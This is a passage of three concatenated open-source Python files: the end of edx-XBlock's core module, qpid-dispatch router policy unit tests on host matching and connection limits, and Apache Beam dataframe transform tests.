    This mixin allows Xblock-like class to declare that it provides aside functionality.
    """

    entry_point = "xblock_asides.v1"

    @classmethod
    def aside_for(cls, view_name):
        """
        A decorator to indicate a function is the aside view for the given view_name.

        Aside views should have a signature like::

            @XBlockAside.aside_for('student_view')
            def student_aside(self, block, context=None):
                ...
                return Fragment(...)

        """
        # pylint: disable=protected-access
        def _decorator(func):  # pylint: disable=missing-docstring
            # Accumulate view names on the function itself so one aside
            # method can decorate several views.
            if not hasattr(func, '_aside_for'):
                func._aside_for = []
            func._aside_for.append(view_name)  # pylint: disable=protected-access
            return func
        return _decorator

    @class_lazy
    def _combined_asides(cls):  # pylint: disable=no-self-argument
        """
        A dictionary mapping XBlock view names to the aside method that
        decorates them (or None, if there is no decorator for the specified view).
        """
        # The method declares what views it decorates. We rely on `dir`
        # to handle subclasses and overrides.
        combined_asides = defaultdict(None)
        for _view_name, view_func in inspect.getmembers(cls, lambda attr: hasattr(attr, '_aside_for')):
            aside_for = getattr(view_func, '_aside_for', [])
            for view in aside_for:
                combined_asides[view] = view_func.__name__
        return combined_asides

    def aside_view_declaration(self, view_name):
        """
        Find and return a function object if one is an aside_view for the given view_name

        Aside methods declare their view provision via @XBlockAside.aside_for(view_name)
        This function finds those declarations for a block.

        Arguments:
            view_name (string): the name of the view requested.

        Returns:
            either the function or None
        """
        if view_name in self._combined_asides:
            return getattr(self, self._combined_asides[view_name])
        else:
            return None

    def needs_serialization(self):
        """
        Return True if the aside has any data to serialize to XML.

        If all of the aside's data is empty or a default value, then the aside shouldn't
        be serialized as XML at all.
        """
        # BUGFIX: dict.itervalues() does not exist on Python 3; .values()
        # works on both Python 2 and 3.  A generator expression (instead
        # of a list) also lets any() short-circuit on the first set field.
        return any(field.is_set_on(self) for field in self.fields.values())
# Maintain backwards compatibility
import xblock.exceptions
class KeyValueMultiSaveError(xblock.exceptions.KeyValueMultiSaveError):
    """
    Deprecated alias kept for backwards compatibility; use
    :class:`xblock.exceptions.KeyValueMultiSaveError` instead.
    """
    def __init__(self, *args, **kwargs):
        # Warn at the caller's location (stacklevel=2), then defer to the
        # canonical exception class.
        warnings.warn(
            "Please use xblock.exceptions.KeyValueMultiSaveError",
            DeprecationWarning,
            stacklevel=2,
        )
        super(KeyValueMultiSaveError, self).__init__(*args, **kwargs)
class XBlockSaveError(xblock.exceptions.XBlockSaveError):
    """
    Deprecated alias kept for backwards compatibility; use
    :class:`xblock.exceptions.XBlockSaveError` instead.
    """
    def __init__(self, *args, **kwargs):
        # Warn at the caller's location (stacklevel=2), then defer to the
        # canonical exception class.
        warnings.warn(
            "Please use xblock.exceptions.XBlockSaveError",
            DeprecationWarning,
            stacklevel=2,
        )
        super(XBlockSaveError, self).__init__(*args, **kwargs)
| nagyistoce/edx-XBlock | xblock/core.py | Python | apache-2.0 | 9,923 |
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import json
from qpid_dispatch_internal.policy.policy_util import HostAddr, is_ipv6_enabled
from qpid_dispatch_internal.policy.policy_util import HostStruct
from qpid_dispatch_internal.policy.policy_util import PolicyError
from qpid_dispatch_internal.policy.policy_util import PolicyAppConnectionMgr
from qpid_dispatch_internal.policy.policy_local import PolicyLocal
from system_test import unittest
from system_test import TestCase, main_module
class PolicyHostAddrTest(TestCase):
    """
    Exercise HostAddr/HostStruct parsing and matching for IPv4 and IPv6
    addresses, ranges, wildcards, and malformed specifications.
    """

    def expect_deny(self, badhostname, msg):
        # Constructing a HostStruct from a malformed spec must raise PolicyError.
        denied = False
        try:
            xxx = HostStruct(badhostname)
        except PolicyError:
            denied = True
        self.assertTrue(denied, ("%s" % msg))

    def check_hostaddr_match(self, tHostAddr, tString, expectOk=True):
        # check that the string is a match for the addr
        # check that the internal struct version matches, too
        ha = HostStruct(tString)
        if expectOk:
            self.assertTrue(tHostAddr.match_str(tString))
            self.assertTrue(tHostAddr.match_bin(ha))
        else:
            self.assertFalse(tHostAddr.match_str(tString))
            self.assertFalse(tHostAddr.match_bin(ha))

    def test_policy_hostaddr_ipv4(self):
        # Create simple host and range
        aaa = HostAddr("192.168.1.1")
        bbb = HostAddr("1.1.1.1,1.1.1.255")
        # Verify host and range
        self.check_hostaddr_match(aaa, "192.168.1.1")
        self.check_hostaddr_match(aaa, "1.1.1.1", False)
        self.check_hostaddr_match(aaa, "192.168.1.2", False)
        self.check_hostaddr_match(bbb, "1.1.1.1")
        self.check_hostaddr_match(bbb, "1.1.1.254")
        self.check_hostaddr_match(bbb, "1.1.1.0", False)
        self.check_hostaddr_match(bbb, "1.1.2.0", False)

    def test_policy_hostaddr_ipv6(self):
        if not is_ipv6_enabled():
            self.skipTest("System IPv6 support is not available")
        # Create simple host and range
        aaa = HostAddr("::1")
        bbb = HostAddr("::1,::ffff")
        ccc = HostAddr("ffff::0,ffff:ffff::0")
        # Verify host and range
        self.check_hostaddr_match(aaa, "::1")
        self.check_hostaddr_match(aaa, "::2", False)
        self.check_hostaddr_match(aaa, "ffff:ffff::0", False)
        self.check_hostaddr_match(bbb, "::1")
        self.check_hostaddr_match(bbb, "::fffe")
        self.check_hostaddr_match(bbb, "::1:0", False)
        self.check_hostaddr_match(bbb, "ffff::0", False)
        self.check_hostaddr_match(ccc, "ffff::1")
        self.check_hostaddr_match(ccc, "ffff:fffe:ffff:ffff::ffff")
        self.check_hostaddr_match(ccc, "ffff:ffff::1", False)
        self.check_hostaddr_match(ccc, "ffff:ffff:ffff:ffff::ffff", False)

    def test_policy_hostaddr_ipv4_wildcard(self):
        # "*" matches every IPv4 address.
        aaa = HostAddr("*")
        self.check_hostaddr_match(aaa, "0.0.0.0")
        self.check_hostaddr_match(aaa, "127.0.0.1")
        self.check_hostaddr_match(aaa, "255.254.253.252")

    def test_policy_hostaddr_ipv6_wildcard(self):
        if not is_ipv6_enabled():
            self.skipTest("System IPv6 support is not available")
        # "*" matches every IPv6 address.
        aaa = HostAddr("*")
        self.check_hostaddr_match(aaa, "::0")
        self.check_hostaddr_match(aaa, "::1")
        self.check_hostaddr_match(aaa, "ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff")

    def test_policy_malformed_hostaddr_ipv4(self):
        # Too many dots, too many comma-separated parts, and inverted ranges
        # must all be rejected.
        self.expect_deny("0.0.0.0.0", "Name or service not known")
        self.expect_deny("1.1.1.1,2.2.2.2,3.3.3.3", "arg count")
        self.expect_deny("9.9.9.9,8.8.8.8", "a > b")

    def test_policy_malformed_hostaddr_ipv6(self):
        if not is_ipv6_enabled():
            self.skipTest("System IPv6 support is not available")
        self.expect_deny("1::2::3", "Name or service not known")
        self.expect_deny("::1,::2,::3", "arg count")
        self.expect_deny("0:ff:0,0:fe:ffff:ffff::0", "a > b")
class QpidDispatch:
    """Stand-in for the dispatch C extension used by policy code under test."""

    def qd_dispatch_policy_c_counts_alloc(self):
        """Pretend to allocate a C-side counts block; return a dummy handle."""
        return 100

    def qd_dispatch_policy_c_counts_refresh(self, cstats, entitymap):
        """No-op refresh of the C-side statistics."""
        return None
class MockAgent:
    """Minimal agent double exposing only what the policy engine touches."""

    def __init__(self):
        # The policy engine reaches through the agent for the C-shim handle.
        self.qd = QpidDispatch()

    def add_implementation(self, entity, cfg_obj_name):
        """Accept and ignore entity registrations."""
        return None
class MockPolicyManager:
    """Policy-manager double that echoes log lines to stdout and records them."""

    def __init__(self):
        self.agent = MockAgent()
        self.logs = []

    def _record(self, level, text):
        """Print *text* tagged with *level* and remember it for assertions."""
        print("%s: %s" % (level, text))
        self.logs.append(text)

    def log_debug(self, text):
        self._record("DEBUG", text)

    def log_info(self, text):
        self._record("INFO", text)

    def log_trace(self, text):
        self._record("TRACE", text)

    def log_error(self, text):
        self._record("ERROR", text)

    def log_warning(self, text):
        self._record("WARNING", text)

    def get_agent(self):
        return self.agent
class PolicyFile(TestCase):
    """
    Drive PolicyLocal user/settings lookups against the built-in test
    configuration.
    """

    # Class-level setup: executed once when the class body is evaluated, so
    # every test shares one loaded policy ruleset.
    manager = MockPolicyManager()
    policy = PolicyLocal(manager)
    policy.test_load_config()

    def test_policy1_test_zeke_ok(self):
        # A user connecting from an allowed host gets the 'test' settings group
        # and the expected per-connection limits.
        p1 = PolicyFile.policy.lookup_user('zeke', '192.168.100.5', 'photoserver', '192.168.100.5:33333', 1)
        self.assertTrue(p1 == 'test')
        upolicy = {}
        self.assertTrue(
            PolicyFile.policy.lookup_settings('photoserver', p1, upolicy)
        )
        self.assertTrue(upolicy['maxFrameSize'] == 444444)
        self.assertTrue(upolicy['maxMessageSize'] == 444444)
        self.assertTrue(upolicy['maxSessionWindow'] == 444444)
        self.assertTrue(upolicy['maxSessions'] == 4)
        self.assertTrue(upolicy['maxSenders'] == 44)
        self.assertTrue(upolicy['maxReceivers'] == 44)
        self.assertTrue(upolicy['allowAnonymousSender'])
        self.assertTrue(upolicy['allowDynamicSource'])
        self.assertTrue(upolicy['targets'] == 'a,private,')
        self.assertTrue(upolicy['sources'] == 'a,private,')

    def test_policy1_test_zeke_bad_IP(self):
        # Lookups from hosts outside the allowed ranges return '' (denied).
        self.assertTrue(
            PolicyFile.policy.lookup_user('zeke', '10.18.0.1', 'photoserver', "connid", 2) == '')
        self.assertTrue(
            PolicyFile.policy.lookup_user('zeke', '72.135.2.9', 'photoserver', "connid", 3) == '')
        self.assertTrue(
            PolicyFile.policy.lookup_user('zeke', '127.0.0.1', 'photoserver', "connid", 4) == '')

    def test_policy1_test_zeke_bad_app(self):
        # An unknown vhost name denies the connection.
        self.assertTrue(
            PolicyFile.policy.lookup_user('zeke', '192.168.100.5', 'galleria', "connid", 5) == '')

    def test_policy1_test_users_same_permissions(self):
        # Different users in the same group resolve to the same settings name.
        zname = PolicyFile.policy.lookup_user('zeke', '192.168.100.5', 'photoserver', '192.168.100.5:33333', 6)
        yname = PolicyFile.policy.lookup_user('ynot', '10.48.255.254', 'photoserver', '192.168.100.5:33334', 7)
        self.assertTrue(zname == yname)

    def test_policy1_lookup_unknown_application(self):
        upolicy = {}
        self.assertFalse(
            PolicyFile.policy.lookup_settings('unknown', 'doesntmatter', upolicy)
        )

    def test_policy1_lookup_unknown_usergroup(self):
        upolicy = {}
        self.assertFalse(
            PolicyFile.policy.lookup_settings('photoserver', 'unknown', upolicy)
        )
class PolicyFileApplicationFallback(TestCase):
    """Verify defaultVhost fallback behavior of PolicyLocal lookups."""

    # Shared policy loaded once at class-creation time.
    manager = MockPolicyManager()
    policy = PolicyLocal(manager)
    policy.test_load_config()

    def test_bad_app_fallback(self):
        # Show that with no fallback the user cannot connect
        self.assertTrue(
            self.policy.lookup_user('zeke', '192.168.100.5', 'galleria', "connid", 5) == '')
        # Enable the fallback defaultVhost and show the same user can now connect
        self.policy.set_default_vhost('photoserver')
        settingsname = self.policy.lookup_user('zeke', '192.168.100.5', 'galleria', "connid", 5)
        self.assertTrue(settingsname == 'test')
        # Show that the fallback settings are returned
        upolicy = {}
        self.assertTrue(
            self.policy.lookup_settings('phony*app*name', settingsname, upolicy)
        )
        self.assertTrue(upolicy['maxFrameSize'] == 444444)
        self.assertTrue(upolicy['maxMessageSize'] == 444444)
        self.assertTrue(upolicy['maxSessionWindow'] == 444444)
        self.assertTrue(upolicy['maxSessions'] == 4)
        self.assertTrue(upolicy['maxSenders'] == 44)
        self.assertTrue(upolicy['maxReceivers'] == 44)
        self.assertTrue(upolicy['allowAnonymousSender'])
        self.assertTrue(upolicy['allowDynamicSource'])
        self.assertTrue(upolicy['targets'] == 'a,private,')
        self.assertTrue(upolicy['sources'] == 'a,private,')
        # Disable fallback and show failure again
        self.policy.set_default_vhost('')
        self.assertTrue(
            self.policy.lookup_user('zeke', '192.168.100.5', 'galleria', "connid", 5) == '')
class PolicyAppConnectionMgrTests(TestCase):
    """
    Exercise PolicyAppConnectionMgr limit enforcement: total connections,
    per-user connections, and per-host connections, plus update/disconnect
    bookkeeping and bad-settings detection.
    """

    def test_policy_app_conn_mgr_fail_by_total(self):
        # Constructor args: (max total, max per user, max per host).
        stats = PolicyAppConnectionMgr(1, 2, 2)
        diags = []
        self.assertTrue(stats.can_connect('10.10.10.10:10000', 'chuck', '10.10.10.10', diags, None, None))
        self.assertFalse(stats.can_connect('10.10.10.10:10001', 'chuck', '10.10.10.10', diags, None, None))
        self.assertTrue(len(diags) == 1)
        self.assertIn('application connection limit', diags[0])

    def test_policy_app_conn_mgr_fail_by_user(self):
        stats = PolicyAppConnectionMgr(3, 1, 2)
        diags = []
        self.assertTrue(stats.can_connect('10.10.10.10:10000', 'chuck', '10.10.10.10', diags, None, None))
        self.assertFalse(stats.can_connect('10.10.10.10:10001', 'chuck', '10.10.10.10', diags, None, None))
        self.assertTrue(len(diags) == 1)
        self.assertIn('per user', diags[0])
        # Per-connection override (the trailing '2') raises the user limit.
        diags = []
        self.assertTrue(stats.can_connect('10.10.10.10:10002', 'chuck', '10.10.10.10', diags, 2, None))
        self.assertFalse(stats.can_connect('10.10.10.10:10003', 'chuck', '10.10.10.10', diags, 2, None))

    def test_policy_app_conn_mgr_fail_by_hosts(self):
        stats = PolicyAppConnectionMgr(3, 2, 1)
        diags = []
        self.assertTrue(stats.can_connect('10.10.10.10:10000', 'chuck', '10.10.10.10', diags, None, None))
        self.assertFalse(stats.can_connect('10.10.10.10:10001', 'chuck', '10.10.10.10', diags, None, None))
        self.assertTrue(len(diags) == 1)
        self.assertIn('per host', diags[0])
        # Per-connection override raises the host limit.
        diags = []
        self.assertTrue(stats.can_connect('10.10.10.10:10002', 'chuck', '10.10.10.10', diags, None, 2))
        self.assertFalse(stats.can_connect('10.10.10.10:10003', 'chuck', '10.10.10.10', diags, None, 2))

    def test_policy_app_conn_mgr_fail_by_user_hosts(self):
        # Both user and host limits trip at once: two diagnostics expected.
        stats = PolicyAppConnectionMgr(3, 1, 1)
        diags = []
        self.assertTrue(stats.can_connect('10.10.10.10:10000', 'chuck', '10.10.10.10', diags, None, None))
        self.assertFalse(stats.can_connect('10.10.10.10:10001', 'chuck', '10.10.10.10', diags, None, None))
        self.assertTrue(len(diags) == 2)
        success = 'per user' in diags[0] or 'per user' in diags[1]
        self.assertTrue(success)
        diags = []
        self.assertTrue(stats.can_connect('10.10.10.10:10002', 'chuck', '10.10.10.10', diags, 2, 2))
        self.assertFalse(stats.can_connect('10.10.10.10:10003', 'chuck', '10.10.10.10', diags, 2, 2))

    def test_policy_app_conn_mgr_update(self):
        # Raising the limits via update() lets a previously denied connection in.
        stats = PolicyAppConnectionMgr(3, 1, 2)
        diags = []
        self.assertTrue(stats.can_connect('10.10.10.10:10000', 'chuck', '10.10.10.10', diags, None, None))
        self.assertFalse(stats.can_connect('10.10.10.10:10001', 'chuck', '10.10.10.10', diags, None, None))
        self.assertTrue(len(diags) == 1)
        self.assertIn('per user', diags[0])
        diags = []
        stats.update(3, 2, 2)
        self.assertTrue(stats.can_connect('10.10.10.10:10001', 'chuck', '10.10.10.10', diags, None, None))

    def test_policy_app_conn_mgr_disconnect(self):
        # A disconnect frees a slot for the next attempt.
        stats = PolicyAppConnectionMgr(3, 1, 2)
        diags = []
        self.assertTrue(stats.can_connect('10.10.10.10:10000', 'chuck', '10.10.10.10', diags, None, None))
        self.assertFalse(stats.can_connect('10.10.10.10:10001', 'chuck', '10.10.10.10', diags, None, None))
        self.assertTrue(len(diags) == 1)
        self.assertIn('per user', diags[0])
        diags = []
        stats.disconnect("10.10.10.10:10000", 'chuck', '10.10.10.10')
        self.assertTrue(stats.can_connect('10.10.10.10:10001', 'chuck', '10.10.10.10', diags, None, None))

    def test_policy_app_conn_mgr_create_bad_settings(self):
        denied = False
        try:
            stats = PolicyAppConnectionMgr(-3, 1, 2)
        except PolicyError:
            denied = True
        self.assertTrue(denied, "Failed to detect negative setting value.")

    def test_policy_app_conn_mgr_update_bad_settings(self):
        denied = False
        try:
            stats = PolicyAppConnectionMgr(0, 0, 0)
        except PolicyError:
            denied = True
        self.assertFalse(denied, "Should allow all zeros.")
        try:
            stats.update(0, -1, 0)
        except PolicyError:
            denied = True
        self.assertTrue(denied, "Failed to detect negative setting value.")

    def test_policy_app_conn_mgr_larger_counts(self):
        stats = PolicyAppConnectionMgr(10000, 10000, 10000)
        diags = []
        for i in range(0, 10000):
            self.assertTrue(stats.can_connect('1.1.1.1:' + str(i), 'chuck', '1.1.1.1', diags, None, None))
            self.assertTrue(len(diags) == 0)
        # The 10001st connection trips all three limits at once.
        self.assertFalse(stats.can_connect('1.1.1.1:10000', 'chuck', '1.1.1.1', diags, None, None))
        self.assertTrue(len(diags) == 3)
        self.assertTrue(stats.connections_active == 10000)
        self.assertTrue(stats.connections_approved == 10000)
        self.assertTrue(stats.connections_denied == 1)
class PolicyAliases(TestCase):
    """
    Verify vhost alias handling: duplicate/conflicting alias names must be
    rejected at ruleset-creation time, and valid aliases must resolve to
    their target vhost at lookup time.
    """

    #
    def test_AliasesRenameOwnVhost(self):
        # A vhost may not list its own hostname as an alias.
        config_str = """
[{
  "hostname": "$default",
  "allowUnknownUser": true,
  "aliases": "$default",
  "groups": {
    "$default": {
      "remoteHosts": "*",
      "allowDynamicSource": true,
      "allowAnonymousSender": true,
      "sources": "$management, examples, q1",
      "targets": "$management, examples, q1",
      "maxSessions": 1
    }
  }
}]
"""
        manager = MockPolicyManager()
        policy = PolicyLocal(manager)
        ruleset = json.loads(config_str)
        denied = False
        try:
            policy.create_ruleset(ruleset[0])
        except PolicyError:
            denied = True
        self.assertTrue(denied, "Ruleset duplicates vhost and alias but condition not detected.")

    #
    def test_SameAliasOnTwoVhosts(self):
        # The same alias ('e') appears on two different vhosts: must be rejected.
        config_str = """
[{
  "hostname": "$default",
  "aliases": "a,b,c,d,e",
  "groups": {
    "$default": {
      "maxSessions": 1
    }
  }
},
{
  "hostname": "doshormigas",
  "aliases": "i,h,g,f,e",
  "groups": {
    "$default": {
      "maxSessions": 1
    }
  }
}]
"""
        manager = MockPolicyManager()
        policy = PolicyLocal(manager)
        ruleset = json.loads(config_str)
        denied = False
        try:
            policy.create_ruleset(ruleset[0])
            policy.create_ruleset(ruleset[1])
        except PolicyError as e:
            denied = True
        self.assertTrue(denied, "Rulesets duplicate same alias in two vhosts but condition not detected.")

    #
    def test_AliasConflictsWithVhost(self):
        # An alias that names another existing vhost must be rejected.
        config_str = """
[{
  "hostname": "$default",
  "groups": {
    "$default": {
      "maxSessions": 1
    }
  }
},
{
  "hostname": "conflict-with-vhost",
  "aliases": "$default",
  "groups": {
    "$default": {
      "maxSessions": 1
    }
  }
}]
"""
        manager = MockPolicyManager()
        policy = PolicyLocal(manager)
        ruleset = json.loads(config_str)
        denied = False
        try:
            policy.create_ruleset(ruleset[0])
            policy.create_ruleset(ruleset[1])
        except PolicyError as e:
            denied = True
        self.assertTrue(denied, "Ruleset alias names other vhost but condition not detected.")

    #
    def test_AliasOperationalLookup(self):
        manager = MockPolicyManager()
        policy = PolicyLocal(manager)
        policy.test_load_config()
        # For this test the test config defines vhost 'photoserver'.
        # This test accesses that vhost using the alias name 'antialias'.
        settingsname = policy.lookup_user('zeke', '192.168.100.5', 'antialias', "connid", 5)
        self.assertTrue(settingsname == 'test')
        upolicy = {}
        self.assertTrue(
            policy.lookup_settings('antialias', settingsname, upolicy)
        )
        self.assertTrue(upolicy['maxFrameSize'] == 444444)
        self.assertTrue(upolicy['sources'] == 'a,private,')
if __name__ == '__main__':
    # Run through the system_test harness so skip/log behavior stays consistent.
    unittest.main(main_module())
| ChugR/qpid-dispatch | tests/router_policy_test.py | Python | apache-2.0 | 17,771 |
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import typing
import unittest
import pandas as pd
import apache_beam as beam
from apache_beam import coders
from apache_beam.dataframe import convert
from apache_beam.dataframe import expressions
from apache_beam.dataframe import frame_base
from apache_beam.dataframe import transforms
from apache_beam.testing.util import assert_that
from apache_beam.testing.util import equal_to
def check_correct(expected, actual):
    """Assert that *actual* matches *expected*.

    pandas NDFrames are compared after sorting by index (partition order is
    nondeterministic); anything else is compared as a scalar. ``actual`` of
    None means no output partitions arrived at all.

    Raises:
        AssertionError: when the values differ (or actual is None).
        ValueError: when *expected* is an unsupported NDFrame subtype.
    """
    if actual is None:
        raise AssertionError('Empty frame but expected: \n\n%s' % (expected))
    if isinstance(expected, pd.core.generic.NDFrame):
        # Row order across partitions is arbitrary; sort both before comparing.
        expected = expected.sort_index()
        actual = actual.sort_index()

        if isinstance(expected, pd.Series):
            pd.testing.assert_series_equal(expected, actual)
        elif isinstance(expected, pd.DataFrame):
            pd.testing.assert_frame_equal(expected, actual)
        else:
            # BUG FIX: the two adjacent string literals previously joined with
            # no separating space, producing "...<class 'X'>,not a Series...".
            raise ValueError(
                f"Expected value is a {type(expected)}, "
                "not a Series or DataFrame.")
    else:
        if actual != expected:
            raise AssertionError('Scalars not equal: %s != %s' % (actual, expected))
def concat(parts):
    """Concatenate a list of partition results into one frame.

    Returns None for an empty list, the sole element for a singleton list,
    and ``pd.concat`` of the pieces otherwise.
    """
    if not parts:
        return None
    if len(parts) == 1:
        return parts[0]
    return pd.concat(parts)
def df_equal_to(expected):
    """Return an assert_that-style matcher comparing concatenated output
    partitions against *expected* via ``check_correct``."""
    def _check(actual):
        return check_correct(expected, concat(actual))

    return _check
# Schema'd element types for the batching tests below; registering a RowCoder
# lets Beam treat these NamedTuples as schema-aware rows.
AnimalSpeed = typing.NamedTuple(
    'AnimalSpeed', [('Animal', str), ('Speed', int)])
coders.registry.register_coder(AnimalSpeed, coders.RowCoder)
Nested = typing.NamedTuple(
    'Nested', [('id', int), ('animal_speed', AnimalSpeed)])
coders.registry.register_coder(Nested, coders.RowCoder)
class TransformTest(unittest.TestCase):
    """End-to-end tests for DataframeTransform and the deferred-frame APIs."""

    def run_scenario(self, input, func):
        """Run *func* three ways and check they agree: directly on pandas,
        via deferred-expression evaluation, and inside a real Beam pipeline
        (with the input split across two partitions)."""
        expected = func(input)

        empty = input.iloc[0:0]
        input_placeholder = expressions.PlaceholderExpression(empty)
        input_deferred = frame_base.DeferredFrame.wrap(input_placeholder)
        actual_deferred = func(input_deferred)._expr.evaluate_at(
            expressions.Session({input_placeholder: input}))
        check_correct(expected, actual_deferred)

        with beam.Pipeline() as p:
            # Split the input into two interleaved partitions to exercise
            # multi-partition behavior.
            input_pcoll = p | beam.Create([input.iloc[::2], input.iloc[1::2]])
            input_df = convert.to_dataframe(input_pcoll, proxy=empty)
            output_df = func(input_df)

            output_proxy = output_df._expr.proxy()
            if isinstance(output_proxy, pd.core.generic.NDFrame):
                self.assertTrue(
                    output_proxy.iloc[:0].equals(expected.iloc[:0]),
                    (
                        'Output proxy is incorrect:\n'
                        f'Expected:\n{expected.iloc[:0]}\n\n'
                        f'Actual:\n{output_proxy.iloc[:0]}'))
            else:
                self.assertEqual(type(output_proxy), type(expected))

            output_pcoll = convert.to_pcollection(output_df, yield_elements='pandas')

            assert_that(
                output_pcoll, lambda actual: check_correct(expected, concat(actual)))

    def test_identity(self):
        df = pd.DataFrame({
            'Animal': ['Falcon', 'Falcon', 'Parrot', 'Parrot'],
            'Speed': [380., 370., 24., 26.]
        })
        self.run_scenario(df, lambda x: x)

    def test_groupby_sum_mean(self):
        df = pd.DataFrame({
            'Animal': ['Falcon', 'Falcon', 'Parrot', 'Parrot'],
            'Speed': [380., 370., 24., 26.]
        })
        self.run_scenario(df, lambda df: df.groupby('Animal').sum())
        # mean() requires a non-parallel (global) computation.
        with expressions.allow_non_parallel_operations():
            self.run_scenario(df, lambda df: df.groupby('Animal').mean())
        self.run_scenario(
            df, lambda df: df.loc[df.Speed > 25].groupby('Animal').sum())

    def test_groupby_apply(self):
        df = pd.DataFrame({
            'group': ['a' if i % 5 == 0 or i % 3 == 0 else 'b' for i in range(100)],
            'foo': [None if i % 11 == 0 else i for i in range(100)],
            'bar': [None if i % 7 == 0 else 99 - i for i in range(100)],
            'baz': [None if i % 13 == 0 else i * 2 for i in range(100)],
        })

        def median_sum_fn(x):
            return (x.foo + x.bar).median()

        describe = lambda df: df.describe()

        self.run_scenario(df, lambda df: df.groupby('group').foo.apply(describe))
        self.run_scenario(
            df, lambda df: df.groupby('group')[['foo', 'bar']].apply(describe))
        self.run_scenario(df, lambda df: df.groupby('group').apply(median_sum_fn))
        self.run_scenario(
            df,
            lambda df: df.set_index('group').foo.groupby(level=0).apply(describe))
        self.run_scenario(df, lambda df: df.groupby(level=0).apply(median_sum_fn))
        self.run_scenario(
            df, lambda df: df.groupby(lambda x: x % 3).apply(describe))

    def test_filter(self):
        df = pd.DataFrame({
            'Animal': ['Aardvark', 'Ant', 'Elephant', 'Zebra'],
            'Speed': [5, 2, 35, 40]
        })
        self.run_scenario(df, lambda df: df.filter(items=['Animal']))
        self.run_scenario(df, lambda df: df.filter(regex='Anim.*'))
        self.run_scenario(
            df, lambda df: df.set_index('Animal').filter(regex='F.*', axis='index'))

        # Aggregations need the non-parallel escape hatch.
        with expressions.allow_non_parallel_operations():
            a = pd.DataFrame({'col': [1, 2, 3]})
            self.run_scenario(a, lambda a: a.agg(sum))
            self.run_scenario(a, lambda a: a.agg(['mean', 'min', 'max']))

    def test_scalar(self):
        with expressions.allow_non_parallel_operations():
            a = pd.Series([1, 2, 6])
            self.run_scenario(a, lambda a: a.agg(sum))
            self.run_scenario(a, lambda a: a / a.agg(sum))

            # Tests scalar being used as an input to a downstream stage.
            df = pd.DataFrame({'key': ['a', 'a', 'b'], 'val': [1, 2, 6]})
            self.run_scenario(
                df, lambda df: df.groupby('key').sum().val / df.val.agg(sum))

    def test_getitem_projection(self):
        df = pd.DataFrame({
            'Animal': ['Aardvark', 'Ant', 'Elephant', 'Zebra'],
            'Speed': [5, 2, 35, 40],
            'Size': ['Small', 'Extra Small', 'Large', 'Medium']
        })
        self.run_scenario(df, lambda df: df[['Speed', 'Size']])

    def test_offset_elementwise(self):
        s = pd.Series(range(10)).astype(float)
        df = pd.DataFrame({'value': s, 'square': s * s, 'cube': s * s * s})
        # Only those values that are both squares and cubes will intersect.
        self.run_scenario(
            df,
            lambda df: df.set_index('square').value + df.set_index('cube').value)

    def test_batching_named_tuple_input(self):
        with beam.Pipeline() as p:
            result = (
                p | beam.Create([
                    AnimalSpeed('Aardvark', 5),
                    AnimalSpeed('Ant', 2),
                    AnimalSpeed('Elephant', 35),
                    AnimalSpeed('Zebra', 40)
                ]).with_output_types(AnimalSpeed)
                | transforms.DataframeTransform(lambda df: df.filter(regex='Anim.*')))

            assert_that(
                result,
                equal_to([('Aardvark', ), ('Ant', ), ('Elephant', ), ('Zebra', )]))

    def test_batching_beam_row_input(self):
        with beam.Pipeline() as p:
            result = (
                p
                | beam.Create([(u'Falcon', 380.), (u'Falcon', 370.), (u'Parrot', 24.),
                               (u'Parrot', 26.)])
                | beam.Map(lambda tpl: beam.Row(Animal=tpl[0], Speed=tpl[1]))
                | transforms.DataframeTransform(
                    lambda df: df.groupby('Animal').mean(), include_indexes=True))

            assert_that(result, equal_to([('Falcon', 375.), ('Parrot', 25.)]))

    def test_batching_beam_row_to_dataframe(self):
        with beam.Pipeline() as p:
            df = convert.to_dataframe(
                p
                | beam.Create([(u'Falcon', 380.), (u'Falcon', 370.), (
                    u'Parrot', 24.), (u'Parrot', 26.)])
                | beam.Map(lambda tpl: beam.Row(Animal=tpl[0], Speed=tpl[1])))

            result = convert.to_pcollection(
                df.groupby('Animal').mean(), include_indexes=True)

            assert_that(result, equal_to([('Falcon', 375.), ('Parrot', 25.)]))

    def test_batching_passthrough_nested_schema(self):
        with beam.Pipeline() as p:
            nested_schema_pc = (
                p | beam.Create([Nested(1, AnimalSpeed('Aardvark', 5))
                                 ]).with_output_types(Nested))
            result = nested_schema_pc | transforms.DataframeTransform(  # pylint: disable=expression-not-assigned
                lambda df: df.filter(items=['animal_speed']))

            assert_that(result, equal_to([(('Aardvark', 5), )]))

    def test_batching_passthrough_nested_array(self):
        Array = typing.NamedTuple(
            'Array', [('id', int), ('business_numbers', typing.Sequence[int])])
        coders.registry.register_coder(Array, coders.RowCoder)

        with beam.Pipeline() as p:
            array_schema_pc = (p | beam.Create([Array(1, [7, 8, 9])]))
            result = array_schema_pc | transforms.DataframeTransform(  # pylint: disable=expression-not-assigned
                lambda df: df.filter(items=['business_numbers']))

            assert_that(result, equal_to([([7, 8, 9], )]))

    def test_unbatching_series(self):
        with beam.Pipeline() as p:
            result = (
                p
                | beam.Create([(u'Falcon', 380.), (u'Falcon', 370.), (u'Parrot', 24.),
                               (u'Parrot', 26.)])
                | beam.Map(lambda tpl: beam.Row(Animal=tpl[0], Speed=tpl[1]))
                | transforms.DataframeTransform(lambda df: df.Animal))

            assert_that(result, equal_to(['Falcon', 'Falcon', 'Parrot', 'Parrot']))

    def test_input_output_polymorphism(self):
